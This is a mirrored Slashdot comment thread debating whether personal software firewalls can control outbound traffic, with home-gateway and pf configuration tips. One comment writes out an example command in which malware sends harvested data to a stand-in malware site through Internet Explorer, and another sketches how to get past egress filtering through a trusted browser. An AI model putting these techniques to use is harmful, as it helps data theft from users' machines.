Slashdot Mirror


Personal Firewalls Mostly Useless, Says Mail & Guardian

hweimer writes "More and more security researchers come to the conclusion that personal firewalls are ineffective in controlling outbound traffic. An article in the Mail & Guardian online mentions a test that 'showed that the software often causes more problems than it solves. Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.' Simple PoCs are available, too."

303 comments

  1. misleading headline by macadamia_harold · · Score: 5, Informative

    More and more security researchers come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.

    The article's about personal software firewalls, not personal hardware firewalls. Furthermore, the fact that personal software firewalls are useless and buggy is not really a new discovery.

    1. Re:misleading headline by iMaple · · Score: 5, Insightful

      Yes, I agree. The title should say "Personal (software) Firewalls Mostly Useless (for outbound traffic)". And that is unpreventable if the user is always logged in as an admin and runs malicious executables (or programs with known security issues, like older versions of browsers). This would be an issue if a non-admin user could disable the firewall (which I guess is not easy, since the article does not mention that). So there is no real problem with the personal firewall software.

      The firewalls are still very useful in preventing attacks due to OS vulnerabilities (like the Windows RPC issues). Anyway that is the main aim of personal firewalls, and the article does not have anything about the effectiveness of the firewall for inbound traffic.

      If you want a secure outbound firewall the best bet is to use a dedicated gateway machine with the firewall (I use my very old laptop with BSD on it as a gateway)

    2. Re:misleading headline by marrandy · · Score: 5, Insightful

      Talk about stating the obvious...this is the most useless article I have read in a long time.

      1) Web browser and javascript bugs - nothing to do with hardware or software firewalls.

      2) email issues, people going to bad sites etc. - nothing to do with hardware or software firewalls.

      3) People should not run as administrator (or root) - wow, really.

      4) People should stay up-to-date on patches - wow, totally amazingly obvious.

      As you can't control people, they will always do these things. Good software firewalls show-up issues after they have made these mistakes, when rogue software tries to get out.

      They also failed (or I missed it) to mention that software firewalls are good when you have multiple computers behind a hardware firewall - basically an infected computer will be blocked from infecting other computers, e.g. via netbios etc.

      Good computer security is a layered concept. From incoming hardware firewalls, IDS, software firewalls on individual computers, user training, security audits etc. I wish people and organizations writing articles would finally learn this. There is no 'magic' one solution.

    3. Re:misleading headline by bytesex · · Score: 4, Insightful

      Software firewalls on the machine itself can do something hardware firewalls can't; it can check to see that the outbound traffic is coming from a trusted application running as an actually logged on user. Without this option, a firewall must assume that all traffic with a destination port 80 or 443 (or 25 or whatever) will be legit, allowing all sorts of malware to pretend to browse while doing their actual nasty stuff. On windows, a firewall could even check whether the app in question has a window open, which creates an extra check (this visible application is making network connections).

      --
      Religion is what happens when nature strikes and groupthink goes wrong.
    4. Re:misleading headline by Just+Some+Guy · · Score: 5, Insightful
      Yes, I agree. The title should say "Personal (software) Firewalls Mostly Useless (for outbound traffic)".

      Actually, you forgot to end with ", On Windows". As you probably already know, you can set a BSD system's "securelevel" such that firewall rules, both in kernel and on disk, can't be altered without a reboot. You could hypothetically write a program that patches a BSD machine's boot sequence with one that unprotects the firewall configuration, alters it, changes the backup file so that the user won't get an email notification later on that details the differences, then resumes normal operation - all while hoping that the user or administrator doesn't notice the spontaneous reboot - but there aren't too many of those running around today.

      --
      Dewey, what part of this looks like authorities should be involved?
    5. Re:misleading headline by creepynut · · Score: 2, Interesting

      Now, I didn't RTFA, but it seems the whole point it is trying to make is that software firewalls AREN'T doing just that.

      From the summary:
      'Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.'
    6. Re:misleading headline by Pieroxy · · Score: 4, Informative

      I use my very old laptop with BSD on it as a gateway
      For a few bucks, you could buy a small Linksys dedicated box. That box - in addition to doing the job fine - uses less power than a laptop will ever do even in its lowest consumption settings. In a few months, the cost of the Linksys box will be recouped on the electric bill. And it is smaller and heats up less.

      My view on the problem at least.

    7. Re:misleading headline by $1uck · · Score: 2, Insightful

      Can you help someone out by pointing me towards a link to a good site that shows how to set something like that up? I've got a bit of experience with Linux and Solaris, but mostly use Windows. I don't have any experience using BSD (though I'd like to look at it). The more complicated my home network gets, the more I want to put something between the modem and the router. I would love to be able to monitor inbound/outbound traffic, block certain sites, etc. I can do some of that with the router, or firewalls on individual machines. I'm sure I can find several sites on Google, but if you've had a good experience with a particular tutorial please share it with me.

    8. Re:misleading headline by Anonymous Coward · · Score: 0

      I'm in a similar situation except that my primary gateway is a K6-2 desktop running Ubuntu. However, I have a Linksys router backing this up. I would shut down the Ubuntu box except that the Linksys box and the phone company's DSL modem don't play well with each other.

    9. Re:misleading headline by NVP_Radical_Dreamer · · Score: 1

      Even "hardware" firewalls are running software. They just don't do it on the host machine, which is where most of the nasties reside and thus attempt to disable/circumvent the firewall.

      --
      The best argument against democracy is a five-minute conversation with the average voter.

      - Winston Churchill
    10. Re:misleading headline by sleep-doc · · Score: 2, Informative

      An old laptop running linux can be a terrific gateway, set up by someone with the appropriate knowledge base and experience. Set up by someone without those skills, it's a zombie-in-waiting.

    11. Re:misleading headline by Jamu · · Score: 1

      The Proof of Concept, linked to in the story, simply uses Internet Explorer to do its dirty work.

      --
      Who ordered that?
    12. Re:misleading headline by Pieroxy · · Score: 1

      You could try to flash the linksys box firmware to a WRT-DD or other that is less likely to have trouble driving your modem.

    13. Re:misleading headline by morgan_greywolf · · Score: 2, Insightful

      Right. But they aren't effective in that measure. Joe Sixpack gets a dialog box that says "Application IEXPLORE.exe is attempting to access the Internet" a few thousand times and he just checks "Allow" or, worse "Always Allow" enough times, he doesn't notice when the box says "Application I_pwn_j00.exe is attempting to access the Internet" so, again, he clicks "Always Allow" just like he's always done. Or, he doesn't know what I_pwn_j00.exe is, but that's what he needs to click in order to continue, so that's what he does.

      Plus, as the article states, most of these software firewalls allow stuff to get through without popping anything up, and some malware can even bypass the software firewall, as shown in the PoC.

      IOW, personal firewalls are not only bad because stuff can get through, either through ignorance, buggy firewall software, or through crafty malware that gets past it, but they're also dangerous in that they create a false sense of security.

      The best ways to truly avoid malware are to not download untrusted/unknown software, to use alternatives that are more secure (Firefox vs. IE, gaim vs. AIM, Thunderbird vs. Outlook, etc.), to disable macros in Microsoft Office, and to run good antivirus and anti-malware applications. Alternatively, one could use a platform that is less susceptible to malware, such as Mac OS X, Linux, or *BSD.

    14. Re:misleading headline by morcego · · Score: 1
      The article's about personal software firewalls, not personal hardware firewalls.

      There is no such thing as hardware firewalls. There are software firewalls, and firewall appliances, which are just a software firewall running on "dedicated" hardware. The hardware itself does no filtering or traffic control.

      I happen to agree with the article. I have been saying for years that those personal firewalls aren't worth their weight in salt (yes, I know how much software weighs). What good is it to have a lock after someone already broke into your computer? Let's face it, the moment a computer gets compromised, it is no longer your computer. It belongs to whoever compromised it.

      Don't get me wrong. I don't consider those NAT boxes as firewalls either. When I get a WRT54G, until I have replaced its firmware and installed a good bunch of iptables rules, I won't consider it any better than, let's say, Zone Alarm. And I'm talking here about the "forbid everything, allow what is necessary" kind of rules.

      Personal firewalls are everywhere these days, ranging from old timers like ZoneAlarm to new runners like Windows XP Firewall from Mickeysoft. And we see how big the botnets are and how far malware spreads these days, proving they are far from effective.
      --
      morcego
    15. Re:misleading headline by Fred_A · · Score: 1

      In an ideal world you'd have to factor in the recycling cost of the laptop though (unless he finds another use for it).
      I'm assuming he won't just throw it in the trash and bring it to a recycling facility where some subsidized magic is assumed to take place (although shipping the thing to China is equally plausible).

      --
      May contain traces of nut.
      Made from the freshest electrons.
    16. Re:misleading headline by bobbonomo · · Score: 1

      Brazil Firewall (Linux based) http://www.brazilfw.com.br/

    17. Re:misleading headline by Anonymous Coward · · Score: 0
      FTA:
      The so-called personal firewall programs commonly used with home PCs are not comparable to the powerful firewalls used in companies or public organisations.
      All I can say is WELL, DUH!
    18. Re:misleading headline by value_added · · Score: 3, Informative

      Can you help someone out by pointing me towards a link to a good site that show's how to set something like that up? I've got a bit of experience with linux and solaris, but mostly use windows. I don't have any experience using BSD ...

      I'll offer a suggestion. Install FreeBSD on any old computer with two NICs. You'll find the installation as easy as any Linux system, the routine maintenance probably easier, and the documentation far superior.

      Sit down to read the pf FAQ on OpenBSD's site. It's well written and comprehensive so read from the first page to the last page. Make some coffee and then read it again.

      # cd /usr/ports/shells/bash && make install
      # echo 'pf_enable="YES"' >> /etc/rc.conf
      # echo 'pf_rules="/etc/pf.conf"' >> /etc/rc.conf

      Edit /etc/pf.conf using the home user scenario provided at the end of the 'pf FAQ'. Reboot and you're good to go.

      You'll find pf far less verbose than iptables, ipfw, etc., and easier to learn and to use for that reason among others. There's also lots of additional tools available for pf that will help as well.

      $ cd /usr/ports && make search name=pf | less

      Google for all the rest.

      A final comment. Using this approach gives you a secure firewall with all the unixy goodness you'd expect, not to mention logging, SSH, NTP synchronisation, etc that you may want to use as well. And earning the right to sneer at everyone using those plastic Linksys NAT boxes doesn't hurt.
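      As an added example (it is not from this post, the pf FAQ, or the FreeBSD project), here is what /etc/pf.conf could look like for the two-NIC FreeBSD gateway described above: NAT for the LAN, default deny in both directions, and outbound traffic limited to an explicit list of services. The interface names fxp0/fxp1, the 192.168.1.0/24 prefix and the port lists are assumptions to adjust for your own box.

```pf
# /etc/pf.conf for a small home gateway (added example, not from the pf FAQ).
# fxp0/fxp1 and the LAN prefix below are assumed names; change them to match
# the NICs and addressing on your own machine.
ext_if  = "fxp0"             # NIC towards the DSL/cable modem (assumed)
int_if  = "fxp1"             # NIC towards the LAN (assumed)
lan_net = "192.168.1.0/24"   # LAN prefix (assumed)

# Services the LAN (and the gateway itself) may reach on the outside.
# When something breaks, add its port here rather than loosening the block rule.
tcp_out = "{ 22, 80, 443 }"  # SSH, HTTP, HTTPS
udp_out = "{ 53, 123 }"      # DNS, NTP

# Drop silently rather than answering with RST/ICMP; skip filtering on loopback.
set block-policy drop
set skip on lo0

# Reassemble fragments and normalise odd TCP flags before filtering.
scrub in all

# Hide the LAN behind whatever address the external interface currently holds.
nat on $ext_if from $lan_net to any -> ($ext_if)

# Default deny, logged, for anything not explicitly passed below.
block log all

# Packets arriving from the internet claiming LAN or loopback sources are spoofed.
block in quick on $ext_if from { $lan_net, 127.0.0.0/8 } to any

# Outbound on the external side: NAT has already rewritten LAN sources to the
# gateway address, so this one rule covers both the gateway and the LAN.
pass out quick on $ext_if proto tcp from ($ext_if) to any port $tcp_out flags S/SA keep state
pass out quick on $ext_if proto udp from ($ext_if) to any port $udp_out keep state

# Inbound from the LAN: only the listed services, plus ping. Anything else the
# LAN tries to reach is dropped and shows up in the pflog interface.
pass in on $int_if proto tcp from $lan_net to any port $tcp_out flags S/SA keep state
pass in on $int_if proto udp from $lan_net to any port $udp_out keep state
pass in on $int_if inet proto icmp from $lan_net to any icmp-type echoreq keep state

# Nothing is passed in on $ext_if, so no service on the gateway is reachable
# from the internet; replies to established connections are matched by state.
```

      Check the file with `pfctl -nf /etc/pf.conf` before loading it with `pfctl -f /etc/pf.conf`; blocked attempts can be watched with `tcpdump -n -e -ttt -i pflog0`. If you later lock the ruleset down with the schg flag and a raised securelevel, as suggested elsewhere in this thread, editing this file means dropping to single-user mode first, so get the port lists right before doing that.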

    19. Re:misleading headline by Just+Some+Guy · · Score: 2, Insightful
      For a few bucks, you could buy a small linksys dedicated box.

      The one major problem is that he'd no longer be running BSD. It's not trivial to migrate a working firewall config from one OS to the other, as I painfully re-learned when I replaced my FreeBSD host with a WRT54G. It's more or less equivalent featurewise, but the setup is completely different. I particularly missed the PF (BSD firewall) configuration, which is as close as such things can get to being considered beautiful.

      --
      Dewey, what part of this looks like authorities should be involved?
    20. Re:misleading headline by nmos · · Score: 1

      In a few months, the cost of the Linksys box will be recouped on the electric bill.

      I seriously doubt that. With the screen off and the battery already charged (or removed) a laptop is probably only using maybe 20W or so and the Linksys box on the shelf next to me uses something like 5-10W. You'd have to wait many years to get your $50-$100 investment back at that rate.

    21. Re:misleading headline by Anonymous Coward · · Score: 0
      If you want a secure outbound firewall the best bet is to use a dedicated gateway machine with the firewall

      But then you can't do application-level filtering. What's the point of outbound filtering if you can't tell which process it's coming from?
    22. Re:misleading headline by Dan+Farina · · Score: 2, Insightful

      Except that the Linksys (Broadcom based, really) NAT boxes consume less power and can perform all of the above similarly. Keep in mind that these devices have a 200 MHz ARM processor and 16 MB of RAM, and so are better than many computers that at one time ran BSD, consume less power, and have a smaller footprint.

      If you insist on having more storage to install programs, one can always use a network mount.

      In any case, there's nothing to sneer at about these little devices.

    23. Re:misleading headline by SilverJets · · Score: 1

      Agreed. I have said it since the days of "Ram Doubler" and "Disk Doubler" (remember them?): "Those are software solutions for hardware problems." If you want a firewall, buy a physical device that is a firewall. Do not rely on software on your computer to act as a firewall.

    24. Re:misleading headline by caseih · · Score: 1

      I'd start by learning about the specialized distros for things like linksys. For example, http://www.openwrt.org/ . Google also has lots of things when last I checked. I'm currently running a WRT54GS (older non-broken version) with openwrt. I have a custom bash script that generates the iptables on boot, I run an openvpn client to bridge my home network with another network, and I have iptables rules that allow transparent http filtering and proxying through an external machine (the linksys isn't beefy enough to run squid, privoxy, dansguardian).

    25. Re:misleading headline by Kazoo+the+Clown · · Score: 1

      The article's about personal software firewalls, not personal hardware firewalls. Furthermore, the fact that personal software firewalls are useless and buggy is not really a new discovery.

      Yeah, but reminding people of that often is not a bad idea...

    26. Re:misleading headline by zotz · · Score: 1

      does anyone know of such small, low powered boxes with four distinct ethernet interfaces?

      one for outside, one for inside, one for dmz and one for wireless.

      all the best,

      drew
      http://www.ourmedia.org/user/17145

      --
      FreeMusicPush If you want to see more Free Music made, listen to Free
    27. Re:misleading headline by plague3106 · · Score: 1

      A final comment. Using this approach gives you a secure firewall with all the unixy goodness you'd expect, not to mention logging, SSH, NTP synchronisation, etc that you may want to use as well. And earning the right to sneer at everyone using those plastic Linksys NAT boxes doesn't hurt.

      Will your sneering stop when they point out they were on the internet safely yesterday, while you were still deciding all the rules?

    28. Re:misleading headline by tomjen · · Score: 1

      So - ban all ports except 80 and 21 (to your ISP only) + DNS. When a game does not work, unban the needed port, but ban it again when you are done playing it.

      --
      Freedom or George Bush
    29. Re:misleading headline by robotsrule · · Score: 1

      On Windows boxes there's an added complication. A lot of apps do their Internet access through another application. Then, for example, with ZoneAlarm, you get a message that something like the "Services and Controller" application wants to access the Internet, which doesn't help you make a good decision. If you disallow it, you might end up breaking an application and not know why. Windows has a lot of similar problems like this where authority passes through processes in a confusing and unaudited manner. Like when you are trying to delete or rename a file and the only error message you get from Windows is "that file is locked by another application". Unless you have an obscure power user utility from a site such as SysInternals/WinInternals which can tell you who has the file lock, you have no idea which app or app(s) is holding the file lock.

      --
      Robert Oschler - RobotsRule.com
    30. Re:misleading headline by Just+Some+Guy · · Score: 1
      You cannot patch anything, if the important files have the system immutable (schg) flag set and you are running on securelevel 3. But then you have to reboot to single user mode to change anything.

      How often do you find yourself messing with the running configuration of a production server? At the other extreme, I reboot my little laptop all the time because it's ancient and doesn't support suspend well. It's not like an extra reboot once a month is intolerable.

      --
      Dewey, what part of this looks like authorities should be involved?
    31. Re:misleading headline by tomjen · · Score: 1

      Let's face it, the moment a computer gets compromised, it is no longer your computer. It belongs to whoever compromised it.

      Which is why you need a firewall to prevent you from getting infected in the first place.

      --
      Freedom or George Bush
    32. Re:misleading headline by bellers · · Score: 1

      >> ..this is the most useless article I have read in a long time.

      Are you *sure* about that?

      Did you read any of the *other* articles on /. today?

      --
      This space for rent.
    33. Re:misleading headline by julesh · · Score: 1

      Actually, you forgot to end with ", On Windows". As you probably already know, you can set a BSD system's "securelevel" such that firewall rules, both in kernel and on disk, can't be altered without a reboot.

      Doesn't matter, unless your firewall configuration blocks access to the hosts you don't want the malware to communicate with[1] you're pretty much down to using whitelisting of processes that are allowed to communicate. In that case, all you have to do is inject the communication you want to make with the outside world into an authorised process. This is trivially easy in most circumstances. You'd just run down a list of common network utilities until you find one that's in the whitelist and which does what you want it to do.

      1: This seems very unlikely to me: pretty much the only way you'd achieve that is by whitelisting hosts you want to communicate with, and who can produce a list of all those hosts? If you get it wrong, you'll have to reboot!

    34. Re:misleading headline by dgatwood · · Score: 4, Interesting

      It also makes dynamic loading and unloading of device drivers impossible, which is why it doesn't make any sense for a desktop system. Security can only be achieved through properly granting permission, not through outright avoiding granting permission. A scheme that is too restrictive will simply get turned off or worked around by the end users, and thus is not particularly useful, and indeed may actually be harmful to security because of developers making security assumptions that are no longer valid in such a situation.

      Want to really improve security? Create multiple separate privilege sets in the kernel instead of a single "root". Make different executables setuid to a user with privilege sets that allow certain operations. Your kernel extension loader has sufficient privileges to load a kernel extension, but still can't write directly to kernel memory or listen on low numbered ports or access raw devices or bypass filesystem permissions. Your software that requires the ability to listen on low numbered ports doesn't get permission to bypass filesystem permissions or load kernel extensions. And so on.

      Don't get me wrong, it's perfectly okay to have a "root" user, but no executable should ever be setuid root in such a scheme, and that root user should only be used for very limited administrative tasks.

      --

      Check out my sci-fi/humor trilogy at PatriotsBooks.

    35. Re:misleading headline by julesh · · Score: 1

      1) Web browser and javascript bugs - nothing to do with hardware or software firewalls.

      Wrong. The point is that a software firewall performing egress filtering cannot easily protect against malware that uses the browser to make its outbound connections.

      Quote:
      Browsers are particularly susceptible, since they are inherently allowed to make a connection with the internet.

      What this means is that if I get my malware running on your computer, I can (say) just run "iexplore.exe http://my.malware.site/logging-script.cgi?info=all+the+information+that+ive+harvested+from+your+machine". And there's nothing that a software firewall can do to stop me.

      Of course, there's little a hardware firewall can do either. Egress filtering is, in the end, a waste of everyone's time, because ultimately it is trivial for malware authors to work around. Remember when everyone was complaining that the XP firewall doesn't do egress filtering? That's actually a good thing: if it did, every bit of malware there is now would be able to work around it. As it is, much of it doesn't bother trying.

      OK, so the rest of the article is pointless, and it doesn't explain the problem very well, but what do you expect from a computer security article in the popular press?

    36. Re:misleading headline by julesh · · Score: 1

      Software firewalls on the machine itself can do something hardware firewalls can't; it can check to see that the outbound traffic is coming from a trusted application running as an actually logged on user.

      Which is pointless when any application running on the system can just dump details of the communication they want to perform into a javascript in an html file, modify the registry parameters that might prevent internet explorer from executing the script, then run "iexplore.exe c:\malware.html" and do whatever they want with the firewall's blessing.

      Trusted processes are meaningless if the trusted process will do whatever the malware asks it to, and once you've got code running on the computer, most web browsers can be configured to do whatever you want them to.

    37. Re:misleading headline by morcego · · Score: 1

      That's why you need a dedicated firewall, instead of that "personal" thing.

      --
      morcego
    38. Re:misleading headline by Anonymous Coward · · Score: 0

      Yes. I have that model, and the Sveasoft firmware is pimp. It has everything I need, and I decommissioned an old HP 120 MHz 486 system running Smoothwall in favor of it. More features, smaller, quieter, and more energy-efficient.

    39. Re:misleading headline by m_frankie_h · · Score: 1

      I meant the need to reboot as an advantage --- as long as the attacker does not have console access, there is not much he can do.

    40. Re:misleading headline by Just+Some+Guy · · Score: 1

      Oh, gotcha. Yep, it's about as locked down as it's possible to make a small modern system.

      --
      Dewey, what part of this looks like authorities should be involved?
    41. Re:misleading headline by slothman32 · · Score: 1

      So are you saying to get rid of my firewalls?
      I have Zone Alarm, BlackIce and a router one.
      This is under 95 which no one "cares" about.
      But under that and XP you would seem to be for uninstalling them.
      This is under a home network with only these two computers on it.

      --
      Why don't you guys have friends or journals?
    42. Re:misleading headline by Anonymous Coward · · Score: 0

      The point of an outgoing firewall is to prevent dumb programs from annoying you about every stupid little upgrade, or from real player telling you about every live concert, etc... Absolutely nothing to do with security. And in the age of software co vs. pirater, I'm going to guess that auto-validation over the internet based on the key entered will become standard, and this isn't a bad way to circumvent it.

    43. Re:misleading headline by jc42 · · Score: 1

      does anyone know of such small, low powered boxes with four distinct ethernet interfaces?
      one for outside, one for inside, one for dmz and one for wireless.


      For that matter, suppose I wanted to do that with a BSD or linux box. Anyone have good suggestions for 4-port ethernet cards? (Or maybe 2 2-port cards, though these days I'd guess it might work just as well if it only used a single card slot.)

      It can be hard to know which vendor's PR to most believe.

      --
      Those who do study history are doomed to stand helplessly by while everyone else repeats it.
    44. Re:misleading headline by zotz · · Score: 1

      Looks like multiple ports but not interfaces. Am I missing something?

      all the best,

      drew

      --
      FreeMusicPush If you want to see more Free Music made, listen to Free
    45. Re:misleading headline by zotz · · Score: 1

      Thanks for the links.

      Are you sure they have multiple (more than two) ethernet interfaces and not just two with multiple ports on the internal interface?

      all the best,

      drew

      --
      FreeMusicPush If you want to see more Free Music made, listen to Free
    46. Re:misleading headline by Baloo+Ursidae · · Score: 1
      More and more security researchers come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.

      And utterly craps itself on every little power blip. The laptop has its own built-in UPS. :o) Not all of us are fortunate enough to live far enough away from California that they're not stealing electricity at below market prices after their legislature voted unanimously to pay any far-above-market price for electric.

      And if you're Californian, shut some goddamn lights off, or build your own electric plants. The Columbia River's hydroelectric is for us, not you. Los Angeles to San Diego can ignore this, they were smart enough to make themselves electrically self-sufficient long before it became a problem, and Northern California (only Del Norte, Siskiyou and Modoc counties are "northern California", the rest is central or southern) is exempt because essentially nobody lives there to have lights to turn on.

      --
      Help us build a better map!
    47. Re:misleading headline by zotz · · Score: 1

      Just for the record, since it seems that everyone has taken it wrong:

      I was asking about four ethernet interfaces (that is, you would see eth0, eth1, eth2, and eth3 if the box was running Linux), not two interfaces with multiple ethernet ports on the internal interface. I am already running a WRT54G. (I am not sure which you are referring to.)

      all the best,

      drew
      (da idea man)

      --
      FreeMusicPush If you want to see more Free Music made, listen to Free
    48. Re:misleading headline by knightperson · · Score: 1

      A Linksys WRT54G series router with the unlocked OpenWRT firmware can do that. Normally the 4-port switch acts like, well, a switch, but you can access the 4 ports separately with the unlocked firmware. Make sure you get one of the "real" Linux-based routers, though. The latest version of the WRT54G has much less memory and is not capable of running OpenWRT (which is an embedded Linux). Most of the GS versions, all of the GL versions, and an assortment of others can be flashed to OpenWRT.

    49. Re:misleading headline by zotz · · Score: 1

      That is what I am running right now, but stock.

      So, you are saying that I can have:

      192.168.110.0/24 on one
      192.168.111.0/24 on two
      192.168.112.0/24 on three
      192.168.113.0/24 on four

      ???

      Can it really do that? If so, cool.

      And then I guess, can the wireless be 192.168.114.0/24 ?

      all the best,

      drew
      (da idea man)

      --
      FreeMusicPush If you want to see more Free Music made, listen to Free
    50. Re:misleading headline by WuphonsReach · · Score: 1

      It's definitely a toss-up for the hardcore geek.

      For me it was decided in favor of the non-Linksys solution because I had a VIA C3 600MHz fanless system sitting idle. So I dropped 2 laptop HDs in, rebuilt the unit and installed Smoothwall. Smoothwall configuration took about an hour since I wasn't doing anything complex at the start.

      I'm not exactly sure how much power it draws, but the attached 1000VA Smart-UPS estimates that it has about 3 hours of run-time during a power outage. There's also a KVM switch, a DSL modem, and a 16-port gigabit switch plugged into that UPS. One of these weeks I'll drag out the Kill-A-Watt meter and find out for sure how many watts that C3 unit is drawing.

      --
      Wolde you bothe eate your cake, and have your cake?
    51. Re:misleading headline by Jaseoldboss · · Score: 1

      But they do a completely different job. My Router controls where traffic can go (eg. not to ad servers) and where it can enter my lan from (hosts that were contacted first).

      My software firewall controls what applications are allowed internet access. I've firewalled off IE and Windows Explorer and also that stupid dog that finds files and silently phones home to sa.microsoft.com

    52. Re:misleading headline by knightperson · · Score: 1

      That's my understanding. I've never needed to access the ports separately, but there is a Linux device for "all four switch ports" and several for individual ports. You can assign IP addresses to them in any way that you could a hard drive based Linux box.

    53. Re:misleading headline by zotz · · Score: 1

      From the site:

http://wiki.openwrt.org/OpenWrtDocs/Configuration#head-1f582c0ad21a03a769e00c345743d6cf85ba878f

If it is doing it, it is doing it with vlans and not separate ethernet interfaces. I will look into it further.

      In any case, does anyone know of a small, low power box with the multiple ethernet interfaces I was asking about? (Or a good way to go about building one from easily available components?)

      all the best,

      drew
      (da idea man)

      --
      FreeMusicPush If you want to see more Free Music made, listen to Free
    54. Re:misleading headline by rainer_d · · Score: 1

      > Are you sure they have multiple (more than two) ethernet interfaces and not just two with multiple ports on the internal interface?

Well, they are independent interfaces - but due to architecture limitations, the total interface-to-interface filter-performance is limited.
      IIRC, the WRAP maxes out at around 30 MBit/s.
      I'm not sure about the Soekris, but it may go a bit higher.
      These are really embedded platforms with focus on space- and power-consumption limitation.
      They can provide a very powerful solution to home and SOHO users (see www.pfsense.org for a Firewall-One killer).
      But their throughput is limited.
For anything that has to be able to cope with multiple saturated FE-interfaces, PCI-X or PCIe is recommended.

      cheers,
      Rainer

      --
      Windows 2000 - from the guys who brought us edlin
  2. Told you so by growse · · Score: 4, Interesting

    Well, that's what happens when you try and introduce a complex topic like network security into the consumer market, and subsequently fail at that task. They (the software manufacturers) fail not only in raising a suitable amount of awareness (if every single computer on the planet was behind a firewall, how many worms/malware would this stop?), but they also fail to do the job properly (not blocking outbound traffic) for those who do install their software.

    --
    There is nothing interesting going on at my blog
    1. Re:Told you so by lightyear4 · · Score: 3, Insightful

      Unfortunately, they also create a false sense of security. In my opinion, that is far, far worse.

  3. "Why home firewall software is a leaky dyke" by Anonymous Coward · · Score: 4, Funny

    As a lesbian, I must protest to this offensive and disparaging comment.

    1. Re:"Why home firewall software is a leaky dyke" by Anonymous Coward · · Score: 1, Funny

      It says `leaky', not `soppy' or `sloppy'. What's your problem?

    2. Re:"Why home firewall software is a leaky dyke" by ArsenneLupin · · Score: 2, Funny

      You forgot to add closeted, anonymous cowardess, you! ;-)

    3. Re:"Why home firewall software is a leaky dyke" by voice_of_all_reason · · Score: 1

      Cowardess? Sounds like a new D&D class.

      can she cast magic missile?

    4. Re:"Why home firewall software is a leaky dyke" by Anonymous Coward · · Score: 0

      As a lesbian, I must protest to this offensive and disparaging comment.

Geeee.... what a fortuitous coincidence! I am a lesbian too, but since my soul is trapped in the body of a big ugly Nerd the crude humor doesn't bother me. It must be due to the high testosterone levels.

    5. Re:"Why home firewall software is a leaky dyke" by LittleBigLui · · Score: 1

      Cowardess? Sounds like a new D&D class.

      can she cast magic missile?


      To quote from some random D&D handbook I just made up:

      Cowardice
      • Strength - 0
      • Dexterity - 0
      • Constitution - 0
      • Intelligence - 0
      • Wisdom - 0
      • Charisma - 25

      The Cowardess (or Cowardice as she is more commonly called) doesn't know any magic and her fighting skills are ridiculous. Yet the fact that she has boobies makes nerds in basements around the world drop their swords and wet their pants. To summarize, she's invincible.
      --
      Free as in mason.
    6. Re:"Why home firewall software is a leaky dyke" by Anonymous Coward · · Score: 0

You realize, of course, that 'dyke' can also mean: 'a barrier constructed to contain the flow of water or to keep out the sea'. Which is the definition they're referring to in this case.

      God, you're smart.

    7. Re:"Why home firewall software is a leaky dyke" by ArsenneLupin · · Score: 2, Funny
      Yet the fact that she has boobies makes nerds in basements around the world drop their swords and wet their pants. To summarize, she's invincible.

      Not really. That's where the gay nerd comes into play, hehe ;-)

    8. Re:"Why home firewall software is a leaky dyke" by Anonymous Coward · · Score: 0

      While you are in the dictionary, Look up humor (or humour :) ).

  4. Outbound Traffic? by parasonic · · Score: 5, Insightful

    Yes, they may be ineffective in controlling outbound traffic. However, that's not the real point of a personal firewall.

    Without a personal firewall, users have a huge issue with inbound traffic when it comes to security, especially in the Windows "territories." I'll never forget the day that I left open an unpatched WinXP box after a fresh install. I watched all of the script kiddies and automated worms go at it from my passive OpenBSD monitoring box. That machine was hacked in under ten minutes just because I left it there, open to the Internet. So, useless? No.

    1. Re:Outbound Traffic? by grub · · Score: 2, Informative


      You could have put that OpenBSD box inline as a firewall (pf is cool) and still done monitoring. Then your XP box would have been safe.

      --
      Trolling is a art,
    2. Re:Outbound Traffic? by A+beautiful+mind · · Score: 1

      I think he was trying to perform an experiment.

      --
      It takes a man to suffer ignorance and smile
      Be yourself no matter what they say
    3. Re:Outbound Traffic? by hweimer · · Score: 1

      Without a personal firewall, users have a huge issue with inbound traffic when it comes to security, especially in the Windows "territories."

      Inbound traffic can be filtered using the OS-supplied firewall (yes, even under Windows). No need to buy questionable TCP/IP stack replacements.

      --
      OS Reviews: Free and Open Source Software
    4. Re:Outbound Traffic? by klingens · · Score: 1

Yes, those 3rd party firewall programs are useless since even Windows can now close ports by default (with their so called "firewall") since XP SP2 2 years ago. Older Windows versions don't have this feature but aren't sold anymore to consumers either. And it's quite rare that consumers buy utility software like this for older PCs anyways. Even if they buy it, the fact that the firewall giving the protection and the firewalled system receiving it are one and the same is not exactly secure. Running under the same account usually to boot. This makes the promised security a total farce in the end.

    5. Re:Outbound Traffic? by grub · · Score: 2, Insightful

      Oh bah... Colour me "stupid" today. :)

      --
      Trolling is a art,
    6. Re:Outbound Traffic? by Anonymous Coward · · Score: 0

      I suppose the author's perfect firewall would stop all inbound and outbound traffic. It's called a scissors.

    7. Re:Outbound Traffic? by InsaneGeek · · Score: 1

So your experiment expects people to not apply any Windows patches, but at the same time expects people to install a 3rd party personal firewall??? Is it just me in thinking that there is a very remote probability of this situation actually occurring?

    8. Re:Outbound Traffic? by CastrTroy · · Score: 1

      But you don't need a firewall for that. Simply putting it behind a router with no ports forwarded will pretty much ensure that the script kiddies and worms can't get in.

      --

      Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
    9. Re:Outbound Traffic? by TheGreek · · Score: 1
      Simply putting it behind a router with no ports forwarded will pretty much ensure that the script kiddies and worms can't get in.
      Until you download MAGIC PORN DIALER 2006.
    10. Re:Outbound Traffic? by idontgno · · Score: 1

      Inbound traffic can be filtered using the OS-supplied firewall (yes, even under Windows).

Most personal firewall products predate the awe-inspiring wonderfulness which is the Windows Firewall. And architecturally, 3rd party software firewalls are comparable to the "integrated" Windows one. (What, you think maybe Microsoft is giving their own firewall developers better hooks into the OS than 3rd-party developers have? While MS has that history, I think they're being too closely watched after numerous high-profile antitrust rulings to get away with it now.)

      The only advantage MS's firewall has is... it's included outta-the-box, and enabled by default (after XP SP2).

      Again, in theory, the outbound protection can be useful, if the "asking for permission to connect" behavior involves a clueful user. A mouse-monkey mashing the "ok" button for every request pretty well defeats that. So the number one limitation to a useful technical security feature? St00pid lusers. Again.

      --
      Welcome to the Panopticon. Used to be a prison, now it's your home.
